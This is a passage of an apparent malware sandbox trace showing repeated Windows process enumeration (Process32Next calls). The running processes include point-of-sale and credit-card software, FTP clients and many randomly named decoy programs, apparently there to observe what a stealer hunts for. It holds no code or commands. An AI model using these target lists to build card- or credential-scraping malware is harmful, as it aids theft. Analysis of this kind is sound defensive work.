lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0287.289] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0287.292] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0287.294] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0287.297] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0287.299] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0287.301] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0287.304] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0287.312] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0287.315] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0287.317] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0287.319] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0287.322] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0287.324] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0287.374] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0287.376] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0287.379] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0287.381] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0287.383] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0287.385] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0287.388] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0287.391] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0287.394] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0287.397] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0287.399] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0287.401] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0287.478] CloseHandle (hObject=0x2170) returned 1 [0287.478] Sleep (dwMilliseconds=0x64) [0287.617] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0287.646] Process32First (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.647] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0287.649] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0287.650] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0287.651] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0287.653] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0287.654] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0287.656] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0287.658] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0287.659] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.660] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.662] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0287.663] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.665] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.666] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.697] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.781] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.783] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.785] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.787] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0287.789] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0287.791] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0287.797] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.799] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0287.801] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0287.803] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0287.805] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0287.807] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.812] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0287.814] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0287.816] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0287.817] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0287.827] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0287.829] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0287.831] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0287.833] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0287.835] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0287.836] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0287.838] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0287.839] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0287.844] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0287.845] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0287.847] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0287.848] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0287.850] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0287.851] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0287.852] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0287.854] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0287.855] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0287.860] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0287.861] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0287.863] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0287.865] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0287.867] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0287.868] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0287.870] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0287.893] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0287.938] Process32Next (in: 